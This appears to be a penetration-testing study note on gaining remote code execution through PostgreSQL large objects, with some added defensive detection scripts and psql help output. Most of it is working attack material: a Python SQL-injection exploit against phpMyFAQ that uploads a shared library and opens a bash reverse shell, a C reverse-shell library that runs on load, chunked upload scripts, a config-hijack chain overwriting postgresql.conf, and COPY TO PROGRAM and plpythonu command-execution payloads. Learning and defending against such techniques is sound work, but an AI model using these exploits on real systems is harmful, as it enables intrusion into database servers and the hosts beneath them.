---
# System prepended metadata

title: PostgreSQL Large Objects
tags: [BlueCyber]

---

# PostgreSQL Large Objects


## RCE in PostgreSQL
- https://hackviser.com/tactics/pentesting/services/postgresql


## PostgreSQL Large Objects

- https://hacktricks.wiki/en/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.html


### RCE in Linux
- https://huntr.com/bounties/faac0c92-8d4b-4901-a933-662b661a3f99
- https://hackmd.io/@LwUkTWwBSVKVI1AAsOQuDg/SJGfuFjpkl
- https://hacktricks.wiki/en/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.html
- https://www.ucolick.org/~de/PG/Man/large_objects.3.html
- https://knowledge.dhound.io/security-practices/exploitation/rce-with-postgresql-extensions
- https://www.tigerdata.com/learn/handling-large-objects-in-postgres
- https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md


The `.so` file: a C user-defined function (UDF) that wraps `system()`. Compile it against the server headers with:
```
gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
```

```c
#include <stdlib.h>   /* system() */
#include <string.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

/* Exposed to SQL with:
   CREATE FUNCTION sys(cstring) RETURNS int AS '<path to .so>', 'pg_exec' LANGUAGE C STRICT; */
PG_FUNCTION_INFO_V1(pg_exec);
Datum pg_exec(PG_FUNCTION_ARGS) {
    char* command = PG_GETARG_CSTRING(0);
    /* run the argument through /bin/sh and return its exit status */
    PG_RETURN_INT32(system(command));
}
```

RCE: Python exploit script that stages the compiled UDF in `pg_largeobject` page by page, writes it to disk with `lo_export`, registers it with `CREATE FUNCTION` and calls it (the injection point is phpMyFAQ's `ajaxservice.php?action=savefaq`).

```python=
#!/usr/bin/python3

import random
import sys

import requests

def reverse_shell_via_large_object(base_url: str, listener_host: str, listener_port: str,
                                   session_id: str):
    loid = random.randint(10, 100000)
    extension_name = "/tmp/pg_exec_{}.so".format(loid)

    payload = """e11', 1000, 0, 'no', 0, 'fake injected content', 'fake injected content', '123<br><div id=\"newFAQContentLink\">More information: <a href=\"http://mvlcw0p4vg6j4e2q50ayzit5yw4nsfg4.oastify.com\" target=\"_blank\">http://mvlcw0p4vg6j4e2q50ayzit5yw4nsfg4.oastify.com</a></div>', 'oldie', 'blah@gmail.com', 'y', '20221102152119', '', 0, '00000000000000', '99991231235959', '2022-11-02 15:21:20', '');"""

    payload += "select lo_create({});".format(loid)

    # Base64 chunks of the UDF extension compiled for Debian buster running
    # PostgreSQL 11.17, one per 2048-byte page of pg_largeobject. The blobs are
    # omitted from this page; fill the list with the base64 of each page in order.
    chunks = []

    insert_template = "INSERT INTO pg_largeobject (loid, pageno, data) VALUES ({}, {}, decode('{}', 'base64'));"

    for pageno, chunk in enumerate(chunks):
        payload += insert_template.format(loid, pageno, chunk)

    payload += "select lo_export({}, '{}');".format(loid, extension_name)

    # UDF Extension is now exported to the file system, load it and open up a reverse shell
    payload += "CREATE FUNCTION sys(cstring) RETURNS int AS '{}', 'pg_exec' LANGUAGE C STRICT;".format(
        extension_name)
    payload += 'SELECT sys(\'bash -c "bash -i >& /dev/tcp/{}/{} 0>&1"\');'.format(
        listener_host, listener_port)
    payload += "DROP FUNCTION IF EXISTS sys(cstring) -- -"

    endpoint = "{}/ajaxservice.php?action=savefaq".format(base_url)
    cookies = {
        "PHPSESSID": session_id,
        "pmf_sid": "1",
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Connection": "close"
    }
    pwn = {
        "lang": payload,  # Injection payload goes here
        "rubrik": "1",
        "answer": "123",
        "name": "oldie",
        "question": "123",
        "keywords": "12331",
        "openQuestionID": '',
        "email": "blah@gmail.com",
        "contentlink": "http://mvlcw0p4vg6j4e2q50ayzit5yw4nsfg4.oastify.com",
    }
    requests.post(endpoint, headers=headers, cookies=cookies, data=pwn)


# Example usage:
# python3 shell.py http://172-105-72-245.ip.linodeusercontent.com/phpmyfaq 172.105.72.245 4242 6tqnncs8bqpai22vkj2g17o828
if __name__ == '__main__':
    if len(sys.argv) != 5:
        print("usage: %s TARGET LHOST LPORT SESSION_ID" % sys.argv[0])
        sys.exit(-1)

    target = sys.argv[1]
    lhost = sys.argv[2]
    lport = sys.argv[3]
    sess_id = sys.argv[4]

    reverse_shell_via_large_object(
        base_url=target, listener_host=lhost, listener_port=lport, session_id=sess_id)
```



The `.so` file that opens a socket connection (reverse shell) from `_init()`, so it runs as soon as PostgreSQL loads the library:

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

/* Built with -nostartfiles, so this _init() becomes the library's init
   entry and runs when the backend dlopen()s the .so; no SQL call is needed. */
void _init() {
    /*
        code taken from https://www.revshells.com/
    */

    int port = 8888;                  /* listener port */
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("172.23.16.1");   /* listener IP */

    /* connect back and attach stdin/stdout/stderr to the socket */
    connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execve("/bin/bash", argv, NULL);
}
```


![image](https://hackmd.io/_uploads/HJT_qgQaZg.png)

```
gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
```

```
FILE="./payload.so"
OUTPUT_DIR="./payload_chunks"
CHUNK_SIZE=2048

mkdir -p "$OUTPUT_DIR"
split -b $CHUNK_SIZE "$FILE" "$OUTPUT_DIR/"

OFFSET=0
for f in $OUTPUT_DIR/*; do
    xxd -p -c 999999 "$f" > "$OUTPUT_DIR/hex_$OFFSET"
    rm "$f"
    OFFSET=$(($OFFSET + $CHUNK_SIZE))
done
```

```python
import os

import requests

URL = "http://localhost:5000/user"  # URL of the vulnerable application
DIR = "E:/Filelocation/Information-Security/Lab/SQLi/Postgre-SQL/Postgre_SQL/payload_chunks"  # directory holding the hex chunks (hex_<offset>) of the .so file
OID = 8382  # OID of the large object in PostgreSQL

# The split script names every chunk hex_<byte offset>. os.listdir() returns
# names in arbitrary order, so sort by that offset before uploading; the offset
# also replaces the old fixed CHUNK_SIZE*LOOP, which never advanced.
chunks = sorted(
    (int(name.split("_", 1)[1]), os.path.join(DIR, name))
    for name in os.listdir(DIR)
    if name.startswith("hex_")
)

for offset, file_path in chunks:
    with open(file_path, "r") as file:
        data = file.read().strip()
    if offset == 0:
        # First chunk: create the large object with lo_from_bytea
        payload = {"name": f"a' union select 1333,CAST((select lo_from_bytea({OID},decode('{data}','hex'))) as text),1-- -"}
    else:
        # Remaining chunks: lo_put writes at the chunk's byte offset (2048 * n)
        payload = {"name": f"a' union select 1333,CAST((select lo_put({OID},{offset},decode('{data}','hex'))) as text),1-- -"}
    res = requests.get(URL, params=payload)
    print(payload)
    print(res.status_code, "\n")
```
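A defender-side counterpart to the chunked upload above, added here and not part of the original notes: it reassembles `(loid, pageno, data)` rows exported from `pg_largeobject` and flags objects whose bytes start with an ELF header, which is what a staged `.so` looks like in the catalog. The sample rows are constructed; the 2048-byte page size is PostgreSQL's default `LOBLKSIZE`.

```python
"""Hunt for native binaries staged inside pg_largeobject.

Added example (not from the original notes). Rows are constructed inline;
in practice they come from
    SELECT loid, pageno, data FROM pg_largeobject ORDER BY loid, pageno;
"""
from collections import defaultdict

LOBLKSIZE = 2048        # bytes per large-object page (default build)
ELF_MAGIC = b"\x7fELF"  # first four bytes of every ELF file


def reassemble(rows):
    """Group (loid, pageno, data) rows into {loid: bytes}.

    Pages may arrive in any order and may have gaps: a page that was never
    written (lo_put at a sparse offset) reads back as zeros, so missing or
    short inner pages are zero-filled to LOBLKSIZE instead of being skipped.
    """
    pages = defaultdict(dict)
    for loid, pageno, data in rows:
        pages[loid][pageno] = bytes(data)

    objects = {}
    for loid, pagemap in pages.items():
        last = max(pagemap)
        buf = bytearray()
        for n in range(last + 1):
            chunk = pagemap.get(n, b"")
            if n < last:                     # only the final page may be short
                chunk = chunk.ljust(LOBLKSIZE, b"\x00")
            buf += chunk
        objects[loid] = bytes(buf)
    return objects


def find_elf_objects(rows):
    """Return the sorted loids whose reassembled content starts with an ELF header."""
    return sorted(loid for loid, blob in reassemble(rows).items()
                  if blob.startswith(ELF_MAGIC))


# Constructed sample: loid 8382 holds a fake ELF (header only, rest zeros)
# split over three pages supplied out of order; loid 16384 is a text document.
FAKE_ELF = ELF_MAGIC + bytes([2, 1, 1]) + b"\x00" * (2 * LOBLKSIZE + 100 - 7)
SAMPLE_ROWS = [
    (8382, 2, FAKE_ELF[2 * LOBLKSIZE:]),
    (8382, 0, FAKE_ELF[:LOBLKSIZE]),
    (8382, 1, FAKE_ELF[LOBLKSIZE:2 * LOBLKSIZE]),
    (16384, 0, b"quarterly report, nothing to see here"),
]

if __name__ == "__main__":
    print("loids containing ELF binaries:", find_elf_objects(SAMPLE_ROWS))
```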


Below is the **full attack flow** from the post *"PostgreSQL SELECT-only RCE"* (adeadfed), summarised in its logical order so it can be reused for OSWE / lab work.

---

# 🧠 Overview of the idea

The post solves a hard case:

* ❌ No stacked queries (`; SELECT ...`)
* ❌ Only a **SELECT** can be injected
* ✅ Yet it still reaches **RCE**

👉 Core idea:

1. **Read the PostgreSQL config**
2. **Overwrite the config → preload a malicious library**
3. **Upload the `.so` file**
4. **Reload the config → trigger RCE**

👉 Key point:

* The functions used:

  * `lo_import` (read a file)
  * `lo_export` (write a file)
  * `lo_from_bytea`, `lo_put` (write binary data)
* All of them run **inside a SELECT** ([@adeadfed][1])

---

# ⚔️ Step 1: Read `postgresql.conf`

Goal: obtain the current config so it can be edited without breaking the server.

### Flow:

```sql
-- 1. Find the config path
SELECT sourcefile FROM pg_file_settings;

-- 2. Load the file into a large object
SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337);

-- 3. Read the file contents
SELECT lo_get(31337);
```

👉 Output:

* returned as hex → decode it to get the text config ([@adeadfed][1])

---

# ⚔️ Step 2: Overwrite the config (the most important step)

Goal: force PostgreSQL to load the attacker's `.so` file.

### Config changes:

```conf
dynamic_library_path = '/tmp:$libdir'
session_preload_libraries = 'payload.so'
```

👉 Meaning:

* `/tmp` = a directory the attacker can write to
* `session_preload_libraries` → the `.so` is loaded on every new DB connection

---

### Write the file with SQL:

```sql
-- 1. Load the encoded config (base64)
SELECT lo_from_bytea(133337, decode('BASE64_CONFIG', 'base64'));

-- 2. Write it to disk (overwrite)
SELECT lo_export(133337, '/var/lib/postgresql/data/postgresql.conf');
```

👉 At this point the config is backdoored ([@adeadfed][1])
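A defensive check for this step, added here and not taken from adeadfed's post: it parses a `postgresql.conf` and flags exactly the two settings above when the library search path includes a world-writable directory or a preload entry resolves through one, and also flags `log_statement = 'none'`, since a SELECT-only chain leaves no trace at that setting. The config text is a constructed sample; the allow-list of expected preload libraries is an assumption the caller supplies.

```python
"""Audit postgresql.conf for the library-hijack settings shown above.

Added example (not from adeadfed's post). The config text is constructed
inline; in production read the file named by
    SELECT sourcefile FROM pg_file_settings;
"""
import re

# Directories any local user can write to. A library search path that
# includes one turns a file-write primitive into code execution.
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
PRELOAD_KEYS = ("shared_preload_libraries", "session_preload_libraries",
                "local_preload_libraries")
_ASSIGN = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_.]*)\s*=?\s*(.*?)\s*$")


def _strip_comment(line):
    """Drop a trailing '# comment', ignoring '#' inside single quotes."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return line[:i]
    return line


def parse_conf(text):
    """Return {name: value} for active settings; the last assignment wins."""
    settings = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line:
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if len(value) >= 2 and value[0] == value[-1] == "'":
            value = value[1:-1].replace("''", "'")   # unquote; '' escapes '
        settings[name] = value
    return settings


def _in_untrusted_dir(path):
    return any(path == d or path.startswith(d + "/") for d in UNTRUSTED_DIRS)


def audit(settings, allowed_libraries=()):
    """Return findings for the config-hijack pattern (empty list = clean)."""
    findings = []
    search_path = settings.get("dynamic_library_path", "$libdir").split(":")
    bad_dirs = [d for d in search_path if _in_untrusted_dir(d)]
    if bad_dirs:
        findings.append(f"dynamic_library_path searches writable dirs: {bad_dirs}")

    for key in PRELOAD_KEYS:
        libs = [s.strip() for s in settings.get(key, "").split(",") if s.strip()]
        for lib in libs:
            if lib.startswith("/") and _in_untrusted_dir(lib):
                findings.append(f"{key} loads {lib} from a writable dir")
            elif not lib.startswith("/") and bad_dirs:
                findings.append(f"{key} loads {lib} by name via a writable dir")
            elif lib not in allowed_libraries:
                findings.append(f"{key} loads {lib}, not on the allow-list")

    if settings.get("log_statement", "none") == "none":
        findings.append("log_statement = none: a SELECT-only chain leaves no log")
    return findings


# Constructed sample: a stock config after Step 2 has been applied.
SAMPLE_CONF = """\
# PostgreSQL configuration (constructed sample)
listen_addresses = 'localhost'          # what IP address(es) to listen on
port = 5432
shared_buffers = 128MB
dynamic_library_path = '/tmp:$libdir'
session_preload_libraries = 'payload.so'
log_statement = 'none'
"""

if __name__ == "__main__":
    for finding in audit(parse_conf(SAMPLE_CONF)):
        print("FINDING:", finding)
```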

---

# ⚔️ Step 3: Upload the `.so` payload

Goal: get the executable file onto the server.

---

### 3.1 Check the version

```sql
SELECT version();
```

👉 so the payload is compiled for the exact PostgreSQL version

---

### 3.2 Upload the `.so` file (chunked)

The binary is large → it has to be split:

```sql
-- create the object
SELECT lo_from_bytea(133338, decode('chunk1', 'base64'));

-- append the remaining chunks
SELECT lo_put(133338, offset, decode('chunkN', 'base64'));

-- write it out to a file
SELECT lo_export(133338, '/tmp/payload.so');
```

👉 `/tmp/payload.so` is the backdoor ([@adeadfed][1])

---

### What does the `.so` payload do?

* When loaded it runs `_init()`
* Typically:

  * a reverse shell
  * command execution

---

# ⚔️ Step 4: Reload the config → trigger RCE

```sql
SELECT pg_reload_conf();
```

👉 Then:

* On the next new connection → PostgreSQL loads the `.so`
* `_init()` runs → RCE

👉 Result:

```bash
uid=999(postgres)
```

([@adeadfed][1])

---

# 🔥 Attack chain summary (important)

```text
SQLi (SELECT only)
        ↓
Read postgresql.conf
        ↓
Overwrite config (preload .so)
        ↓
Upload payload.so
        ↓
Reload config
        ↓
New DB connection
        ↓
RCE
```
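The chain above can be turned into detection content. This is an added example, not part of the original post: it scores `log_statement = 'all'` log lines per backend pid for the large-object, preload and C-UDF primitives the page uses, and alerts when one session accumulates enough of them. The log lines are constructed, and the `log_line_prefix` format (`%m [%p] ` with an optional `%u@%d `) is an assumption.

```python
"""Score PostgreSQL statement logs for the large-object RCE chain above.

Added example (not from the original post). Assumes the default
log_line_prefix '%m [%p] ' optionally followed by '%u@%d ', and
log_statement = 'all' (a SELECT-only chain is never recorded by 'ddl' or
'mod'). Log lines are constructed samples.
"""
import re
from collections import defaultdict

# (rule name, pattern, weight). Names follow the steps of the chain.
RULES = [
    ("lo_import_conf", re.compile(r"lo_import\s*\(\s*'[^']*postgresql\.conf", re.I), 3),
    ("lo_export_conf", re.compile(r"lo_export\s*\([^)]*postgresql\.conf", re.I), 5),
    ("lo_export_library", re.compile(r"lo_export\s*\([^)]*\.(so|dll)'", re.I), 5),
    ("lo_write_bytes", re.compile(r"\b(lo_from_bytea|lo_put|lowrite)\s*\(", re.I), 1),
    ("raw_pg_largeobject", re.compile(r"insert\s+into\s+pg_largeobject\b", re.I), 4),
    ("preload_setting", re.compile(r"(session|shared|local)_preload_libraries|dynamic_library_path", re.I), 4),
    ("c_language_udf", re.compile(r"create\s+function\b.*\blanguage\s+c\b", re.I | re.S), 4),
    ("reload_conf", re.compile(r"pg_reload_conf\s*\(", re.I), 2),
    ("copy_program", re.compile(r"\bcopy\b.*\b(to|from)\s+program\b", re.I), 5),
]
ALERT_THRESHOLD = 8   # one file write plus at least one more primitive per session

_LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?:\S+@\S+ )?LOG:\s+statement:\s*(?P<sql>.*)$")


def parse_line(line):
    """Return (pid, sql) for a statement log line, or None for anything else."""
    m = _LOG_LINE.match(line)
    return (m.group("pid"), m.group("sql")) if m else None


def score_sessions(lines):
    """Return {pid: {"score": int, "hits": [rule names]}} per backend pid."""
    sessions = defaultdict(lambda: {"score": 0, "hits": []})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, sql = parsed
        for name, pattern, weight in RULES:
            if pattern.search(sql):
                sessions[pid]["score"] += weight
                sessions[pid]["hits"].append(name)
    return dict(sessions)


def alerts(lines):
    """Pids whose accumulated score reaches the threshold, sorted."""
    return sorted(pid for pid, s in score_sessions(lines).items()
                  if s["score"] >= ALERT_THRESHOLD)


# Constructed sample: pid 4242 replays the SELECT-only chain; pid 5150 is a
# backup job that legitimately touches large objects.
SAMPLE_LOG = """\
2024-03-01 10:00:01.001 UTC [4242] app@faq LOG:  statement: SELECT name FROM faq WHERE name = 'a'
2024-03-01 10:00:02.002 UTC [4242] app@faq LOG:  statement: SELECT sourcefile FROM pg_file_settings
2024-03-01 10:00:03.003 UTC [4242] app@faq LOG:  statement: SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)
2024-03-01 10:00:04.004 UTC [4242] app@faq LOG:  statement: SELECT lo_from_bytea(133337, decode('BASE64_CONFIG', 'base64'))
2024-03-01 10:00:05.005 UTC [4242] app@faq LOG:  statement: SELECT lo_export(133337, '/var/lib/postgresql/data/postgresql.conf')
2024-03-01 10:00:06.006 UTC [4242] app@faq LOG:  statement: SELECT lo_export(133338, '/tmp/payload.so')
2024-03-01 10:00:07.007 UTC [4242] app@faq LOG:  statement: SELECT pg_reload_conf()
2024-03-01 10:01:00.000 UTC [5150] backup@faq LOG:  statement: SELECT lo_import('/var/backups/report.pdf')
2024-03-01 10:01:01.000 UTC [5150] backup@faq LOG:  statement: SELECT lo_put(16385, 2048, decode('00', 'hex'))
"""

if __name__ == "__main__":
    for pid, info in score_sessions(SAMPLE_LOG.splitlines()).items():
        print(pid, info["score"], info["hits"])
    print("alert on pids:", alerts(SAMPLE_LOG.splitlines()))
```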

---

# ⚠️ Requirements for the exploit to work

* Privileges to call:

  * `lo_import`, `lo_export`
  * or a role close to DBA
* Permission to write files on the host
* The DB runs as an OS user that can write the config

👉 In short:

> **high privileges are required (DBA or equivalent)**

---

# 💡 Key insights (often asked in OSWE)

### 1. Why does this bypass "SELECT only"?

* No stacked query is needed
* All the logic lives in **nested SELECTs**

---

### 2. Strengths of this technique

* Does not need:

  * `COPY ... PROGRAM`
  * `xp_cmdshell`
* Pure PostgreSQL abuse

---

### 3. What kind of technique is this?

👉 **File write + DLL hijacking (PostgreSQL style)**

---


Remember this pattern:

* `lo_import` → read file
* `lo_export` → write file
* `pg_largeobject` → intermediate storage
* config injection → persistence + RCE


Comparing these three PostgreSQL RCE techniques is very much "exam material" for OSWE, because they represent **three different mindsets**:
👉 *direct OS command* vs *language abuse* vs *config hijack + file write*

---

# ⚔️ 1. `COPY TO PROGRAM` RCE

## 🧠 Idea

Run an OS command directly through PostgreSQL

```sql
COPY (SELECT '') TO PROGRAM 'id';
```

---

## ⚙️ How it works

* PostgreSQL spawns a process on the OS
* The command runs as the `postgres` user

---

## ✅ Advantages

* **Immediate** RCE
* Extremely short payload
* No file upload needed

---

## ❌ Disadvantages

* ❗ Needs high privileges:

  * superuser
* ❗ Often disabled
* ❗ Needs stacked queries (`;`)

---

## 🔥 Practical value

* ⭐⭐⭐☆☆ (rare in the exam because it is too "direct")

---

# ⚔️ 2. `plpython` RCE

## 🧠 Idea

Use the Python interpreter embedded in PostgreSQL

```sql
CREATE FUNCTION pwn() RETURNS void AS $$
import os
os.system("id")
$$ LANGUAGE plpythonu;

SELECT pwn();
```

---

## ⚙️ How it works

* PostgreSQL supports procedural languages
* `plpythonu` = untrusted → can run OS commands

---

## ✅ Advantages

* Flexible (write Python code)
* No `.so` file needed

---

## ❌ Disadvantages

* ❗ Needs:

  * `CREATE FUNCTION`
  * the `plpythonu` extension must be installed
* ❗ Often disabled
* ❗ Needs stacked queries

---

## 🔥 Practical value

* ⭐⭐☆☆☆ (seen in CTFs, rare in practice)

---

# ⚔️ 3. SELECT-only RCE (adeadfed)

## 🧠 Idea

No direct command execution → instead:

```text
write a file + hijack the config → PostgreSQL runs the payload itself
```

---

## ⚙️ How it works

1. `lo_import` → read file
2. `lo_export` → write file
3. overwrite the config
4. upload the `.so`
5. preload → auto-execute

---

## ✅ Advantages

* ✔️ No stacked queries needed
* ✔️ Only **SELECT** is needed
* ✔️ Bypasses many filters
* ✔️ Very stealthy (looks like persistence)

---

## ❌ Disadvantages

* ❗ Complex (many steps)
* ❗ needs file-write privileges
* ❗ requires understanding PostgreSQL internals

---

## 🔥 Practical value

* ⭐⭐⭐⭐⭐

---

# ⚖️ Side-by-side comparison

| Technique       | Privileges needed | Needs `;` | Difficulty | Stealth | Practical value |
| --------------- | ----------------- | --------- | ---------- | ------- | --------------- |
| COPY TO PROGRAM | superuser         | ✅        | ⭐         | ❌      | ⭐⭐⭐           |
| plpython        | create function   | ✅        | ⭐⭐       | ❌      | ⭐⭐            |
| SELECT-only RCE | high (lo_*)       | ❌        | ⭐⭐⭐⭐   | ✅      | ⭐⭐⭐⭐⭐       |

---

# RCE steps on Linux
**Authors**: < [nixawk](https://github.com/nixawk) >

----


# POSTGRESQL HACK

----

## DATABASE CONNECTION

Connect to the **postgresql** database:

```
lab:~/ $ psql -h 127.0.0.1 -U postgres -W
```

----

## DATABASE COMMANDS

```
postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
```

```
postgres=# \h
Available help:
  ABORT                            CREATE FOREIGN DATA WRAPPER      DROP SEQUENCE
  ALTER AGGREGATE                  CREATE FOREIGN TABLE             DROP SERVER
  ALTER COLLATION                  CREATE FUNCTION                  DROP TABLE
  ALTER CONVERSION                 CREATE GROUP                     DROP TABLESPACE
  ALTER DATABASE                   CREATE INDEX                     DROP TEXT SEARCH CONFIGURATION
  ALTER DEFAULT PRIVILEGES         CREATE LANGUAGE                  DROP TEXT SEARCH DICTIONARY
  ALTER DOMAIN                     CREATE MATERIALIZED VIEW         DROP TEXT SEARCH PARSER
  ALTER EVENT TRIGGER              CREATE OPERATOR                  DROP TEXT SEARCH TEMPLATE
  ALTER EXTENSION                  CREATE OPERATOR CLASS            DROP TRIGGER
  ALTER FOREIGN DATA WRAPPER       CREATE OPERATOR FAMILY           DROP TYPE
  ALTER FOREIGN TABLE              CREATE ROLE                      DROP USER
  ALTER FUNCTION                   CREATE RULE                      DROP USER MAPPING
  ALTER GROUP                      CREATE SCHEMA                    DROP VIEW
  ALTER INDEX                      CREATE SEQUENCE                  END
  ALTER LANGUAGE                   CREATE SERVER                    EXECUTE
  ALTER LARGE OBJECT               CREATE TABLE                     EXPLAIN
  ALTER MATERIALIZED VIEW          CREATE TABLE AS                  FETCH
  ALTER OPERATOR                   CREATE TABLESPACE                GRANT
  ALTER OPERATOR CLASS             CREATE TEXT SEARCH CONFIGURATION INSERT
  ALTER OPERATOR FAMILY            CREATE TEXT SEARCH DICTIONARY    LISTEN
  ALTER ROLE                       CREATE TEXT SEARCH PARSER        LOAD
  ALTER RULE                       CREATE TEXT SEARCH TEMPLATE      LOCK
  ALTER SCHEMA                     CREATE TRIGGER                   MOVE
  ALTER SEQUENCE                   CREATE TYPE                      NOTIFY
  ALTER SERVER                     CREATE USER                      PREPARE
  ALTER SYSTEM                     CREATE USER MAPPING              PREPARE TRANSACTION
  ALTER TABLE                      CREATE VIEW                      REASSIGN OWNED
  ALTER TABLESPACE                 DEALLOCATE                       REFRESH MATERIALIZED VIEW
  ALTER TEXT SEARCH CONFIGURATION  DECLARE                          REINDEX
  ALTER TEXT SEARCH DICTIONARY     DELETE                           RELEASE SAVEPOINT
  ALTER TEXT SEARCH PARSER         DISCARD                          RESET
  ALTER TEXT SEARCH TEMPLATE       DO                               REVOKE
  ALTER TRIGGER                    DROP AGGREGATE                   ROLLBACK
  ALTER TYPE                       DROP CAST                        ROLLBACK PREPARED
  ALTER USER                       DROP COLLATION                   ROLLBACK TO SAVEPOINT
  ALTER USER MAPPING               DROP CONVERSION                  SAVEPOINT
  ALTER VIEW                       DROP DATABASE                    SECURITY LABEL
  ANALYZE                          DROP DOMAIN                      SELECT
  BEGIN                            DROP EVENT TRIGGER               SELECT INTO
  CHECKPOINT                       DROP EXTENSION                   SET
  CLOSE                            DROP FOREIGN DATA WRAPPER        SET CONSTRAINTS
  CLUSTER                          DROP FOREIGN TABLE               SET ROLE
  COMMENT                          DROP FUNCTION                    SET SESSION AUTHORIZATION
  COMMIT                           DROP GROUP                       SET TRANSACTION
  COMMIT PREPARED                  DROP INDEX                       SHOW
  COPY                             DROP LANGUAGE                    START TRANSACTION
  CREATE AGGREGATE                 DROP MATERIALIZED VIEW           TABLE
  CREATE CAST                      DROP OPERATOR                    TRUNCATE
  CREATE COLLATION                 DROP OPERATOR CLASS              UNLISTEN
  CREATE CONVERSION                DROP OPERATOR FAMILY             UPDATE
  CREATE DATABASE                  DROP OWNED                       VACUUM
  CREATE DOMAIN                    DROP ROLE                        VALUES
  CREATE EVENT TRIGGER             DROP RULE                        WITH
  CREATE EXTENSION                 DROP SCHEMA                      

```

```
postgres=# \?
General
  \copyright             show PostgreSQL usage and distribution terms
  \g [FILE] or ;         execute query (and send results to file or |pipe)
  \gset [PREFIX]         execute query and store results in psql variables
  \h [NAME]              help on syntax of SQL commands, * for all commands
  \q                     quit psql
  \watch [SEC]           execute query every SEC seconds

Query Buffer
  \e [FILE] [LINE]       edit the query buffer (or file) with external editor
  \ef [FUNCNAME [LINE]]  edit function definition with external editor
  \p                     show the contents of the query buffer
  \r                     reset (clear) the query buffer
  \s [FILE]              display history or save it to file
  \w FILE                write query buffer to file

Input/Output
  \copy ...              perform SQL COPY with data stream to the client host
  \echo [STRING]         write string to standard output
  \i FILE                execute commands from file
  \ir FILE               as \i, but relative to location of current script
  \o [FILE]              send all query results to file or |pipe
  \qecho [STRING]        write string to query output stream (see \o)

Informational
  (options: S = show system objects, + = additional detail)
  \d[S+]                 list tables, views, and sequences
  \d[S+]  NAME           describe table, view, sequence, or index
  \da[S]  [PATTERN]      list aggregates
  \db[+]  [PATTERN]      list tablespaces
  \dc[S+] [PATTERN]      list conversions
  \dC[+]  [PATTERN]      list casts
  \dd[S]  [PATTERN]      show object descriptions not displayed elsewhere
  \ddp    [PATTERN]      list default privileges
  \dD[S+] [PATTERN]      list domains
  \det[+] [PATTERN]      list foreign tables
  \des[+] [PATTERN]      list foreign servers
  \deu[+] [PATTERN]      list user mappings
  \dew[+] [PATTERN]      list foreign-data wrappers
  \df[antw][S+] [PATRN]  list [only agg/normal/trigger/window] functions
  \dF[+]  [PATTERN]      list text search configurations
  \dFd[+] [PATTERN]      list text search dictionaries
  \dFp[+] [PATTERN]      list text search parsers
  \dFt[+] [PATTERN]      list text search templates
  \dg[+]  [PATTERN]      list roles
  \di[S+] [PATTERN]      list indexes
  \dl                    list large objects, same as \lo_list
  \dL[S+] [PATTERN]      list procedural languages
  \dm[S+] [PATTERN]      list materialized views
  \dn[S+] [PATTERN]      list schemas
  \do[S]  [PATTERN]      list operators
  \dO[S+] [PATTERN]      list collations
  \dp     [PATTERN]      list table, view, and sequence access privileges
  \drds [PATRN1 [PATRN2]] list per-database role settings
  \ds[S+] [PATTERN]      list sequences
  \dt[S+] [PATTERN]      list tables
  \dT[S+] [PATTERN]      list data types
  \du[+]  [PATTERN]      list roles
  \dv[S+] [PATTERN]      list views
  \dE[S+] [PATTERN]      list foreign tables
  \dx[+]  [PATTERN]      list extensions
  \dy     [PATTERN]      list event triggers
  \l[+]   [PATTERN]      list databases
  \sf[+] FUNCNAME        show a function's definition
  \z      [PATTERN]      same as \dp

Formatting
  \a                     toggle between unaligned and aligned output mode
  \C [STRING]            set table title, or unset if none
  \f [STRING]            show or set field separator for unaligned query output
  \H                     toggle HTML output mode (currently off)
  \pset [NAME [VALUE]]   set table output option
                         (NAME := {format|border|expanded|fieldsep|fieldsep_zero|footer|null|
                         numericlocale|recordsep|recordsep_zero|tuples_only|title|tableattr|pager})
  \t [on|off]            show only rows (currently off)
  \T [STRING]            set HTML <table> tag attributes, or unset if none
  \x [on|off|auto]       toggle expanded output (currently off)

Connection
  \c[onnect] {[DBNAME|- USER|- HOST|- PORT|-] | conninfo}
                         connect to new database (currently "postgres")
  \encoding [ENCODING]   show or set client encoding
  \password [USERNAME]   securely change the password for a user
  \conninfo              display information about current connection

Operating System
  \cd [DIR]              change the current working directory
  \setenv NAME [VALUE]   set or unset environment variable
  \timing [on|off]       toggle timing of commands (currently off)
  \! [COMMAND]           execute command in shell or start interactive shell

Variables
  \prompt [TEXT] NAME    prompt user to set internal variable
  \set [NAME [VALUE]]    set internal variable, or list all if no parameters
